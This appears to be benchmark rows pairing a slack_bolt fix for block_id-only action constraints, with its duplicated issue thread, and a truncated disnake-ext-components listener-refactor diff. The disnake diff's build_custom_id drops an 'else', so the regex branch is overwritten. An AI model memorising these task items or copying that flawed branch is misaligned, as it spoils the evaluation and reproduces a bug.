block_id: Optional[Union[str, Pattern]] = constraints.get("block_id")
+ action_id: Optional[Union[str, Pattern]] = constraints.get("action_id")
+ if block_id is None and action_id is None:
+ return False
block_id_matched = block_id is None or _matches(block_id, action.get("block_id"))
- action_id_matched = _matches(constraints["action_id"], action["action_id"])
+ action_id_matched = action_id is None or _matches(action_id, action.get("action_id"))
return block_id_matched and action_id_matched
| app.action listener should accept block_id-only constraints for bolt-js feature parity
(Filling out the following details about bugs will help us solve your issue sooner.)
### Reproducible in:
```bash
pip freeze | grep slack
python --version
sw_vers && uname -v # or `ver`
```
#### The `slack_bolt` version
```
$ .venv/bin/pip freeze | grep slack
slack-bolt==1.18.0
slack-sdk==3.24.0
```
#### Python runtime version
```
$ .venv/bin/python --version
Python 3.9.16
```
#### OS info
(`sw_vers` is not valid in RHEL-related OSes)
```
$ cat /etc/redhat-release && uname -v
AlmaLinux release 9.2 (Turquoise Kodkod)
#1 SMP PREEMPT_DYNAMIC Tue Sep 12 09:28:32 EDT 2023
```
#### Steps to reproduce:
```python
@app.action( { 'type': 'block_action', 'block_id': 'response' } )
def handle_response_action(ack, client, body):
pass
```
### Expected result:
Per the documentation...
> You can use a constraints object to listen to `block_id`s and `action_id`s (or any combination of them).
Therefore, I expected to have an action handler that responded to any action from a block with id `response`.
### Actual result:
```
Failed to run a middleware (error: 'action_id')
Traceback (most recent call last):
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/app/app.py", line 534, in dispatch
if listener.matches(req=req, resp=resp):
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener/listener.py", line 25, in matches
is_matched = matcher.matches(req, resp)
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener_matcher/builtins.py", line 54, in matches
return self.func(
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener_matcher/builtins.py", line 327, in func
return _block_action(constraints, body)
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener_matcher/builtins.py", line 317, in _block_action
action_id_matched = _matches(constraints["action_id"], action["action_id"])
KeyError: 'action_id'
```
## Requirements
Please read the [Contributing guidelines](https://github.com/slackapi/bolt-python/blob/main/.github/contributing.md) and [Code of Conduct](https://slackhq.github.io/code-of-conduct) before creating this issue or pull request. By submitting, you are agreeing to those rules.
app.action listener should accept block_id-only constraints for bolt-js feature parity
(Filling out the following details about bugs will help us solve your issue sooner.)
### Reproducible in:
```bash
pip freeze | grep slack
python --version
sw_vers && uname -v # or `ver`
```
#### The `slack_bolt` version
```
$ .venv/bin/pip freeze | grep slack
slack-bolt==1.18.0
slack-sdk==3.24.0
```
#### Python runtime version
```
$ .venv/bin/python --version
Python 3.9.16
```
#### OS info
(`sw_vers` is not valid in RHEL-related OSes)
```
$ cat /etc/redhat-release && uname -v
AlmaLinux release 9.2 (Turquoise Kodkod)
#1 SMP PREEMPT_DYNAMIC Tue Sep 12 09:28:32 EDT 2023
```
#### Steps to reproduce:
```python
@app.action( { 'type': 'block_action', 'block_id': 'response' } )
def handle_response_action(ack, client, body):
pass
```
### Expected result:
Per the documentation...
> You can use a constraints object to listen to `block_id`s and `action_id`s (or any combination of them).
Therefore, I expected to have an action handler that responded to any action from a block with id `response`.
### Actual result:
```
Failed to run a middleware (error: 'action_id')
Traceback (most recent call last):
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/app/app.py", line 534, in dispatch
if listener.matches(req=req, resp=resp):
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener/listener.py", line 25, in matches
is_matched = matcher.matches(req, resp)
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener_matcher/builtins.py", line 54, in matches
return self.func(
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener_matcher/builtins.py", line 327, in func
return _block_action(constraints, body)
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener_matcher/builtins.py", line 317, in _block_action
action_id_matched = _matches(constraints["action_id"], action["action_id"])
KeyError: 'action_id'
```
## Requirements
Please read the [Contributing guidelines](https://github.com/slackapi/bolt-python/blob/main/.github/contributing.md) and [Code of Conduct](https://slackhq.github.io/code-of-conduct) before creating this issue or pull request. By submitting, you are agreeing to those rules.
| Hi @darkfoxprime, thanks for taking the time to share this feedback! Indeed, the document should clearly mention this. We will improve it later on.
Since a block_actions event can occur per a block element w/ action_id, thie is by design. Thus, please set a unique action_id for each interactive block element in your blocks.
> Hi @darkfoxprime, thanks for taking the time to share this feedback! Indeed, the document should clearly mention this. We will improve it later on.
>
> Since a block_actions event can occur per a block element w/ action_id, thie is by design. Thus, please set a unique action_id for each interactive block element in your blocks.
The requirement for a "unique" `action_id` is exactly why I want to be able to add an action handler on the `block_id` instead. My app uses dynamically-generated sets of actions, so it's impossible for me to be able to specify action ids for responding to them. However, they all are contained within blocks with known block ids, so being able to use `@app.action( { 'block_id': '...' } )` with no `action_id` would greatly simplify this work.
For this particular scenario, we currently recommend appending a prefix to the auto-generated action_id string values. Then pass a regexp that matches the prefix to an `app.action` listener.
If we receive the same request more in the future (actually this is the first time to learn this need for us), we may consider enhancing the dictionary constraint to support only having block_id. However, I have to say that it's not our team's primary focus for us at this moment. It'd appreciated if you could understand this.
In that case, please fix the documentation so that it clearly states that the `action_id` is required in the constraints.
Hi @darkfoxprime, I am so sorry that I was wrong here. The document is in alignment with bolt-js, and the behavior of bolt-js is like you expect. Therefore, I must retract my above statement. We will improve bolt-python's behavior to be consistent with bolt-js. Though I'm presently occupied with a different task, I'm confident that I can make a new patch release including the fix for this issue within the next few business days.
Hi @darkfoxprime, thanks for taking the time to share this feedback! Indeed, the document should clearly mention this. We will improve it later on.
Since a block_actions event can occur per a block element w/ action_id, thie is by design. Thus, please set a unique action_id for each interactive block element in your blocks.
> Hi @darkfoxprime, thanks for taking the time to share this feedback! Indeed, the document should clearly mention this. We will improve it later on.
>
> Since a block_actions event can occur per a block element w/ action_id, thie is by design. Thus, please set a unique action_id for each interactive block element in your blocks.
The requirement for a "unique" `action_id` is exactly why I want to be able to add an action handler on the `block_id` instead. My app uses dynamically-generated sets of actions, so it's impossible for me to be able to specify action ids for responding to them. However, they all are contained within blocks with known block ids, so being able to use `@app.action( { 'block_id': '...' } )` with no `action_id` would greatly simplify this work.
For this particular scenario, we currently recommend appending a prefix to the auto-generated action_id string values. Then pass a regexp that matches the prefix to an `app.action` listener.
If we receive the same request more in the future (actually this is the first time to learn this need for us), we may consider enhancing the dictionary constraint to support only having block_id. However, I have to say that it's not our team's primary focus for us at this moment. It'd appreciated if you could understand this.
In that case, please fix the documentation so that it clearly states that the `action_id` is required in the constraints.
Hi @darkfoxprime, I am so sorry that I was wrong here. The document is in alignment with bolt-js, and the behavior of bolt-js is like you expect. Therefore, I must retract my above statement. We will improve bolt-python's behavior to be consistent with bolt-js. Though I'm presently occupied with a different task, I'm confident that I can make a new patch release including the fix for this issue within the next few business days. | 2023-11-21T06:51:46 | 0.0 | [] | [] |
||
DisnakeCommunity/disnake-ext-components | DisnakeCommunity__disnake-ext-components-5 | a42ddc7ee5d168c6352cb0f97d4d80365760ccab | diff --git a/.flake8 b/.flake8
index e1675c9..eeb9251 100644
--- a/.flake8
+++ b/.flake8
@@ -6,8 +6,9 @@ max-line-length = 110
per-file-ignores =
**/__init__.py: F401, F403
- # Give examples the space they need
+ # Give examples and tests the space they need
examples/*.py: E501
+ tests/*.py: E501
accept-encodings = utf-8
docstring-convention = numpy
\ No newline at end of file
diff --git a/.gitignore b/.gitignore
index d8c0081..e048841 100644
--- a/.gitignore
+++ b/.gitignore
@@ -6,5 +6,6 @@ __pycache__
test.py
*.ipynb
+tests/_*.py
coverage.*
.coverage
\ No newline at end of file
diff --git a/disnake_ext_components/abc.py b/disnake_ext_components/abc.py
index 7960be9..f51a9b8 100644
--- a/disnake_ext_components/abc.py
+++ b/disnake_ext_components/abc.py
@@ -1,10 +1,11 @@
import abc
+import asyncio.coroutines
import sys
import typing as t
-import disnake
+from disnake.ext import commands
-from . import params, types_
+from . import params, types_, utils
if sys.version_info >= (3, 10):
from typing import ParamSpec
@@ -16,18 +17,34 @@
T = t.TypeVar("T")
ParentT = t.TypeVar("ParentT")
P = ParamSpec("P")
-InteractionT = t.TypeVar("InteractionT", bound=disnake.Interaction)
ListenerT = t.TypeVar("ListenerT", bound="BaseListener[t.Any, t.Any, t.Any]")
-class BaseListener(types_.partial[t.Awaitable[T]], abc.ABC, t.Generic[P, T, InteractionT]):
+class BaseListener(abc.ABC, t.Generic[P, T, types_.InteractionT]):
- # These are just to conform to dpy listener spec
- __name__: str
+ # Make asyncio.iscoroutinefunction believe this is a coroutine function...
+ _is_coroutine = asyncio.coroutines._is_coroutine # type: ignore
+
+ # These are just to conform to dpy listener spec...
__cog_listener__: t.Final[t.Literal[True]] = True
__cog_listener_names__: t.List[types_.ListenerType]
+ parent: t.Optional[t.Any]
+ """The class on which this listener is defined, if any.
+ Used to set the `self` parameter on the listener.
+ """
+
+ callback: t.Callable[..., types_.Coro[T]]
+ """The callback function wrapped by this listener."""
+
+ name: t.Optional[str]
+ """The name is used to determine the custom id spec for the listener.
+ This can be customized in `~.__init__`. For most listeners, the name will equal the name of
+ the bound callback function.
+ If no name is provided, custom_id name validation will will be skipped.
+ """
+
id_spec: str
"""The spec that inbound `custom_id`s should match. Also used to create new custom ids; see
`~.build_custom_id`.
@@ -49,26 +66,53 @@ class BaseListener(types_.partial[t.Awaitable[T]], abc.ABC, t.Generic[P, T, Inte
about their regex pattern(s) and converter(s).
"""
- def __new__(
- cls: t.Type[ListenerT],
- func: t.Callable[..., t.Awaitable[T]],
- **kwargs: t.Any,
- ) -> ListenerT:
- self = super().__new__(cls, func)
- self.__name__ = func.__name__
- return self
+ checks: t.List[types_.CheckCallback[types_.InteractionT]]
+ """Check functions that are called when the listener is invoked. All of these must pass for
+ the listener invocation to complete.
+ """
- def __get__(self: ListenerT, instance: t.Any, _) -> ListenerT:
+ def __init__(
+ self,
+ callback: t.Callable[..., types_.Coro[T]],
+ *,
+ name: t.Optional[str] = None,
+ regex: t.Union[str, t.Pattern[str], None] = None,
+ sep: str = ":",
+ ) -> None:
+ self.checks = []
+ self.parent = None
+
+ self.callback = callback
+ self.name = name
+ self.__name__ = callback.__name__
+ self._signature = commands.params.signature(callback) # type: ignore
+
+ if regex:
+ self.regex = utils.ensure_compiled(regex)
+ self.id_spec = utils.id_spec_from_regex(self.regex)
+ self.sep = None
+
+ else:
+ self.regex = None
+ self.id_spec = utils.id_spec_from_signature(self.name or "", sep, self._signature)
+ self.sep = sep
+
+ def __get__(self: ListenerT, instance: t.Optional[t.Any], _) -> ListenerT:
"""Abuse descriptor functionality to inject instance of the owner class as first arg."""
# Inject instance of the owner class as the partial's first arg.
# If need be, we could add support for classmethods by checking the
# type of self.func and injecting the owner class instead where appropriate.
- self.__setstate__((self.func, (instance,), {}, self.__dict__)) # type: ignore
+ self.parent = instance
return self
+ async def __call__(self, *args: t.Any, **kwargs: t.Any) -> T:
+ if self.parent:
+ return await self.callback(self.parent, *args, **kwargs)
+ return await self.callback(*args, **kwargs)
+
def error(
- self, func: t.Callable[[ParentT, InteractionT, Exception], t.Any]
- ) -> t.Callable[[ParentT, InteractionT, Exception], t.Any]:
+ self, func: t.Callable[[ParentT, types_.InteractionT, Exception], t.Any]
+ ) -> t.Callable[[ParentT, types_.InteractionT, Exception], t.Any]:
"""Register an error handler for this listener.
Note: Not yet implemented.
"""
@@ -100,7 +144,9 @@ def parse_custom_id(self, custom_id: str) -> t.Tuple[str, ...]:
return tuple(params.values())
name, *params = custom_id.split(self.sep)
- if name != self.__name__ or len(params) != len(self.params):
+ # If no name is set, skip name check. Otherwise, assure stored and provided name are equal.
+ # Also confirm the number of incoming params matches the number of params on the listener.
+ if (self.name and name != self.name) or (len(params) != len(self.params)):
raise ValueError(f"Listener spec {self.id_spec} did not match custom_id {custom_id}.")
return tuple(params)
@@ -110,7 +156,8 @@ async def build_custom_id(self, *args: P.args, **kwargs: P.kwargs) -> str:
the values entered are valid according to the listener's typehints, the custom_id is
guaranteed to be matched by the listener.
- Note: No actual validation is done on the values entered.
+ Note: No actual validation is done on the values entered, though they are converted where
+ possible.
Parameters
----------
@@ -139,11 +186,35 @@ async def build_custom_id(self, *args: P.args, **kwargs: P.kwargs) -> str:
kwargs.update(args_as_kwargs) # This is safe as we ensured there is no overlap.
- # "Serialize" types to str...
- deserialized_kwargs = {
- param.name: await param.to_str(kwargs[param.name]) for param in self.params
+ # "Serialize" types to strings; empty string for None (optional)...
+ serialized_kwargs = {
+ param.name: "" if kwargs[param.name] is None else await param.to_str(kwargs[param.name])
+ for param in self.params
}
if self.regex:
- return self.id_spec.format(**deserialized_kwargs)
- return self.id_spec.format(sep=self.sep, **deserialized_kwargs)
+ custom_id = self.id_spec.format(**serialized_kwargs)
+ custom_id = self.id_spec.format(sep=self.sep, **serialized_kwargs)
+
+ if not custom_id: # Fallback in case the listener has neither a name nor params.
+ return self.__name__
+ return custom_id
+
+ def add_check(self, callback: types_.CheckT) -> types_.CheckT:
+ """Add a check to the listener. Like `commands.check` checks, these checks must
+ take an interaction as their sole parameter and must return a boolean. Checks may
+ be coroutines, though this is not required. Checks are run when the listener is
+ called by an interaction event, and are bypassed when the listener is called manually.
+ All checks must pass for the interaction to go through and fire the listener callback.
+
+ Parameters
+ ----------
+ check: t.Callable[[:class:`disnake.Interaction`], MaybeCoro[:class:`bool`]]
+ The check to be added.
+
+ Returns:
+ t.Callable[[:class:`disnake.Interaction`], MaybeCoro[:class:`bool`]]
+ The callback of the check is returned unedited such that it can be used elsewhere.
+ """
+ self.checks.append(callback)
+ return callback
diff --git a/disnake_ext_components/converter.py b/disnake_ext_components/converter.py
index 32d36e0..255f1e7 100644
--- a/disnake_ext_components/converter.py
+++ b/disnake_ext_components/converter.py
@@ -6,12 +6,14 @@
import disnake
from disnake.ext import commands
+from . import types_
+
__all__ = ["ALLOW_CONVERTER_FETCHING", "CONVERTER_MAP"]
CollectionT = t.TypeVar("CollectionT", bound=t.Collection[t.Any])
ConverterSig = t.Union[
- t.Callable[..., t.Awaitable[t.Any]],
+ t.Callable[..., types_.Coro[t.Any]],
t.Callable[..., t.Any],
]
ChannelT = t.TypeVar("ChannelT", disnake.abc.GuildChannel, disnake.Thread)
@@ -39,7 +41,7 @@ class ALLOW_CONVERTER_FETCHING: # There's probably a better way of doing this..
def collection_converter(
collection_type: t.Type[CollectionT],
inner_converter: ConverterSig,
-) -> t.Callable[[t.Collection[str], disnake.Interaction, t.List[t.Any]], t.Awaitable[CollectionT]]:
+) -> t.Callable[[t.Collection[str], disnake.Interaction, t.List[t.Any]], types_.Coro[CollectionT]]:
"""Create a converter for a given collection type."""
async def _convert_collection(
@@ -60,7 +62,7 @@ async def _convert_collection(
return _convert_collection
-def make_channel_converter(type_: t.Type[ChannelT]) -> t.Callable[..., t.Awaitable[ChannelT]]:
+def make_channel_converter(type_: t.Type[ChannelT]) -> t.Callable[..., types_.Coro[ChannelT]]:
"""Create a channel converter for a given channel type."""
async def _convert_channel(argument: str, inter: disnake.Interaction) -> ChannelT:
@@ -289,7 +291,7 @@ def make_flag_converter(type_: t.Type[FlagT]) -> t.Callable[..., FlagT]:
"""Create a flag converter for a given flag type."""
def _convert_flag(argument: str, inter: disnake.Interaction) -> FlagT:
- return type_._from_value(int(argument))
+ return type_._from_value(int(argument)) # pyright: ignore[reportUnknownMemberType]
return _convert_flag
diff --git a/disnake_ext_components/deprecation.py b/disnake_ext_components/deprecation.py
new file mode 100644
index 0000000..13d3ab1
--- /dev/null
+++ b/disnake_ext_components/deprecation.py
@@ -0,0 +1,52 @@
+# Thanks to genshin.py for this
+
+import functools
+import inspect
+import typing
+import warnings
+
+__all__ = ["deprecated", "warn_deprecated"]
+
+CallableT = typing.TypeVar("CallableT", bound=typing.Callable[..., typing.Any])
+
+
+def warn_deprecated(
+ obj: typing.Any,
+ *,
+ alternative: typing.Optional[str] = None,
+ stack_level: int = 3,
+) -> None:
+ """Raise a deprecation warning."""
+ if inspect.isclass(obj) or inspect.isfunction(obj):
+ obj = f"{obj.__qualname__}"
+
+ message = f"{obj} is deprecated and will be removed in the following version."
+
+ if alternative is not None:
+ message += f" You can use '{alternative}' instead."
+
+ warnings.warn(message, category=DeprecationWarning, stacklevel=stack_level)
+
+
+def deprecated(alternative: typing.Optional[str] = None) -> typing.Callable[[CallableT], CallableT]:
+ """Mark a function as deprecated."""
+
+ def decorator(obj: CallableT) -> CallableT:
+ alternative_str = f"You can use `{alternative}` instead.\n" if alternative else ""
+
+ doc = (
+ "!!! warning\n"
+ f" This function is deprecated and will be removed in an upcoming version.\n"
+ f" {alternative_str}"
+ "\n\n"
+ ) + (inspect.getdoc(obj) or "")
+ obj.__doc__ = doc
+
+ @functools.wraps(obj)
+ def wrapper(*args: typing.Any, **kwargs: typing.Any) -> typing.Any:
+ warn_deprecated(obj, alternative=alternative, stack_level=3)
+ return obj(*args, **kwargs)
+
+ return typing.cast("CallableT", wrapper)
+
+ return decorator
diff --git a/disnake_ext_components/listener.py b/disnake_ext_components/listener.py
index 7d4dd25..adb68e8 100644
--- a/disnake_ext_components/listener.py
+++ b/disnake_ext_components/listener.py
@@ -1,12 +1,13 @@
from __future__ import annotations
+import inspect
import sys
import typing as t
import disnake
from disnake.ext import commands
-from . import abc, params, types_, utils
+from . import abc, deprecation, params, types_, utils
__all__ = [
"button_listener",
@@ -15,6 +16,7 @@
"SelectListener",
"modal_listener",
"ModalListener",
+ "match_component",
]
@@ -32,37 +34,54 @@
ListenerT = t.TypeVar("ListenerT", bound="abc.BaseListener[t.Any, t.Any, t.Any]")
-InteractionT = t.TypeVar("InteractionT", disnake.MessageInteraction, disnake.ModalInteraction)
-ErrorHandlerT = t.Callable[[ParentT, InteractionT, Exception], t.Any]
+ComponentListener = t.Union[
+ "ButtonListener[t.Any, t.Any]",
+ "SelectListener[t.Any, t.Any]",
+]
+
+ButtonReference = t.Union[
+ disnake.Button,
+ disnake.ui.Button[t.Any],
+ types_.AbstractComponent,
+]
+SelectReference = t.Union[
+ disnake.SelectMenu,
+ disnake.ui.Select[t.Any],
+ types_.AbstractComponent,
+]
-# TODO: Make this more compact.
+# fmt: off
ButtonListenerCallback = t.Union[
- t.Callable[Concatenate[ParentT, disnake.MessageInteraction, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.MessageInteraction, P], t.Awaitable[T]],
+ t.Callable[Concatenate[ParentT, disnake.MessageInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.MessageInteraction, P], types_.Coro[T]],
]
SelectListenerCallback = t.Union[
- t.Callable[Concatenate[ParentT, disnake.MessageInteraction, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.MessageInteraction, t.Any, P], t.Awaitable[T]],
+ t.Callable[Concatenate[ParentT, disnake.MessageInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.MessageInteraction, t.Any, P], types_.Coro[T]],
+
+ t.Callable[Concatenate[disnake.MessageInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.MessageInteraction, t.Any, P], types_.Coro[T]],
]
-# flake8: noqa: E241
+# flake8: noqa: E501
ModalListenerCallback = t.Union[
- # fmt: off
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
-
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- # fmt: on
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+
+ t.Callable[Concatenate[disnake.ModalInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, t.Any, P], types_.Coro[T]],
]
+# fmt: on
class ButtonListener(abc.BaseListener[P, T, disnake.MessageInteraction]):
@@ -89,33 +108,25 @@ class ButtonListener(abc.BaseListener[P, T, disnake.MessageInteraction]):
Under normal circumstances, this should not lead to conflicts. In case ':' is intentionally
part of the `custom_id`s matched by the listener, this should be set to a different value
to prevent conflicts.
+ reference: Optional[Union[:class:`disnake.Button`, :class:`disnake.ui.Button`, :class:`AbstractComponent`]
+ A reference component used to set default values in `~.build_component`.
"""
__cog_listener_names__: t.List[types_.ListenerType] = [types_.ListenerType.BUTTON]
- def __new__(
- cls: t.Type[ListenerT],
- func: ButtonListenerCallback[ParentT, P, T],
- **kwargs: t.Any,
- ) -> ListenerT:
- return super().__new__(cls, func, **kwargs)
+ reference: types_.AbstractComponent
+ """A reference component used to set default values in `~.build_component`."""
def __init__(
self,
- func: ButtonListenerCallback[ParentT, P, T],
+ callback: ButtonListenerCallback[ParentT, P, T],
*,
+ name: t.Optional[str] = None,
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
+ reference: t.Optional[ButtonReference] = None,
) -> None:
- self._signature = commands.params.signature(func) # pyright: ignore
- if regex:
- self.regex = utils.ensure_compiled(regex)
- self.id_spec = utils.id_spec_from_regex(self.regex)
- self.sep = None
- else:
- self.regex = None
- self.id_spec = utils.id_spec_from_signature(self.__name__, sep, self._signature)
- self.sep = sep
+ super().__init__(callback, name=name, regex=regex, sep=sep)
special_params, listener_params = utils.extract_listener_params(self._signature)
@@ -126,6 +137,19 @@ def __init__(
)
self.params = [params.ParamInfo.from_param(param) for param in listener_params]
+ self.reference = self._choose_optimal_reference(reference)
+
+ def _choose_optimal_reference(
+ self,
+ component: t.Optional[ButtonReference],
+ ) -> types_.AbstractComponent:
+ if component is not None: # Manually provided takes highest priority
+ if isinstance(component, types_.AbstractComponent):
+ return component
+ return types_.AbstractComponent.from_component(component)
+
+ # Nothing of use was found, return an AbstractComponent that can match any button.
+ return types_.AbstractComponent(type=disnake.ComponentType.button)
async def __call__( # pyright: ignore
self,
@@ -166,6 +190,9 @@ async def __call__( # pyright: ignore
except ValueError:
return
+ if not await utils.assert_all_checks(self.checks, inter):
+ return
+
converted: t.Dict[str, t.Any] = {}
for param, arg in zip(self.params, custom_id_params):
converted[param.name] = await param.convert(
@@ -177,6 +204,26 @@ async def __call__( # pyright: ignore
return await super().__call__(inter, **converted)
+ async def build_component(
+ self,
+ style: t.Optional[disnake.ButtonStyle] = None,
+ label: t.Optional[str] = None,
+ disabled: t.Optional[bool] = None,
+ url: t.Optional[str] = None,
+ emoji: t.Union[str, disnake.Emoji, disnake.PartialEmoji, None] = None,
+ *args: P.args,
+ **kwargs: P.kwargs,
+ ) -> disnake.ui.Button[t.Any]:
+ return self.reference.with_overrides(
+ style=style,
+ label=label,
+ disabled=disabled,
+ url=url,
+ emoji=emoji,
+ custom_id=await self.build_custom_id(*args, **kwargs),
+ ).as_component(disnake.ui.Button[t.Any])
+
+ @deprecation.deprecated("build_component")
async def build_button(
self,
style: disnake.ButtonStyle = disnake.ButtonStyle.secondary,
@@ -187,21 +234,25 @@ async def build_button(
*args: P.args,
**kwargs: P.kwargs,
) -> disnake.ui.Button[t.Any]:
- return disnake.ui.Button(
+ return await self.build_component(
style=style,
label=label,
disabled=disabled,
- custom_id=await self.build_custom_id(*args, **kwargs),
url=url,
emoji=emoji,
+ *args,
+ **kwargs,
)
+ build_button.__doc__ = build_component.__doc__
+
def button_listener(
*,
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
bot: t.Optional[commands.Bot] = None,
+ reference: t.Optional[ButtonReference] = None,
) -> t.Callable[[ButtonListenerCallback[ParentT, P, T]], ButtonListener[P, T]]:
"""Create a new :class:`ButtonListener` from a decorated function. The :class:`ButtonListener`
will take care of regex-matching and persistent data stored in the `custom_id` of the
@@ -236,7 +287,7 @@ def button_listener(
def wrapper(
func: ButtonListenerCallback[ParentT, P, T],
) -> ButtonListener[P, T]:
- listener = ButtonListener[P, T](func, regex=regex, sep=sep)
+ listener = ButtonListener[P, T](func, regex=regex, sep=sep, reference=reference)
if bot is not None:
bot.add_listener(listener, types_.ListenerType.BUTTON)
@@ -270,48 +321,70 @@ class SelectListener(abc.BaseListener[P, T, disnake.MessageInteraction]):
Under normal circumstances, this should not lead to conflicts. In case ':' is intentionally
part of the `custom_id`s matched by the listener, this should be set to a different value
to prevent conflicts.
+ reference: Optional[Union[:class:`disnake.SelectMenu`, :class:`disnake.ui.Select`, :class:`AbstractComponent`]
+ A reference component used to set default values in `~.build_component`.
"""
__cog_listener_names__: t.List[types_.ListenerType] = [types_.ListenerType.SELECT]
- select_param: params.ParamInfo
+ select_param: t.Optional[params.ParamInfo]
"""The parameter with which the user-selected value(s) will be parsed. The values will be
converted to match the type annotation of this parameter.
"""
- def __new__(
- cls: t.Type[ListenerT],
- func: SelectListenerCallback[ParentT, P, T],
- **kwargs: t.Any,
- ) -> ListenerT:
- return super().__new__(cls, func, **kwargs)
+ reference: types_.AbstractComponent
+ """A reference component used to set default values in `~.build_component`."""
def __init__(
self,
- func: SelectListenerCallback[ParentT, P, T],
+ callback: SelectListenerCallback[ParentT, P, T],
*,
+ name: t.Optional[str] = None,
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
+ reference: t.Optional[SelectReference] = None,
) -> None:
- self._signature = commands.params.signature(func) # pyright: ignore
- if regex:
- self.regex = utils.ensure_compiled(regex)
- self.id_spec = utils.id_spec_from_regex(self.regex)
- self.sep = None
- else:
- self.regex = None
- self.id_spec = utils.id_spec_from_signature(self.__name__, sep, self._signature)
- self.sep = sep
+ super().__init__(callback, name=name, regex=regex, sep=sep)
special_params, listener_params = utils.extract_listener_params(self._signature)
self.params = [params.ParamInfo.from_param(param) for param in listener_params]
- if len(special_params) != 1:
+ if len(special_params) > 1:
raise TypeError(
- f"A `{type(self).__name__}` must have exactly one parameter before the "
- f"keyword-only argument separator (`*,`), got {len(special_params)}."
+ f"A `{type(self).__name__}` must have exactly zero or one parameter before "
+ f"the keyword-only argument separator (`*,`), got {len(special_params)}."
)
- self.select_param = params.ParamInfo.from_param(special_params[0])
+
+ if special_params:
+ self.select_param = params.ParamInfo.from_param(param := special_params[0])
+ self.reference = self._choose_optimal_reference(reference, param)
+
+ else:
+ self.select_param = None
+ self.reference = self._choose_optimal_reference(reference, None)
+
+ def _choose_optimal_reference(
+ self,
+ component: t.Optional[SelectReference],
+ param: t.Optional[inspect.Parameter],
+ ) -> types_.AbstractComponent:
+ if component is not None: # Manually provided takes highest priority
+ if isinstance(component, types_.AbstractComponent):
+ return component
+ return types_.AbstractComponent.from_component(component)
+
+ if param is not None and isinstance(default := param.default, types_.AbstractComponent):
+ if not default.get("options") and types_.get_origin(param.annotation) is t.Literal:
+ # No options were defined in the AbstractComponent but the parameter was
+ # annotated as literal, thus we should infer the options from the parameter.
+ return default.with_overrides(
+ options=[str(arg) for arg in types_.get_args(param.annotation)]
+ )
+
+ return default
+
+ # Nothing of use was found, return an AbstractComponent that can match any select.
+ return types_.AbstractComponent(type=disnake.ComponentType.select)
async def __call__( # pyright: ignore
self,
@@ -352,6 +425,9 @@ async def __call__( # pyright: ignore
except ValueError:
return
+ if not await utils.assert_all_checks(self.checks, inter):
+ return
+
# First convert custom_id params...
converted: t.Dict[str, t.Any] = {}
for param, arg in zip(self.params, custom_id_params):
@@ -362,13 +438,18 @@ async def __call__( # pyright: ignore
skip_validation=bool(self.regex),
)
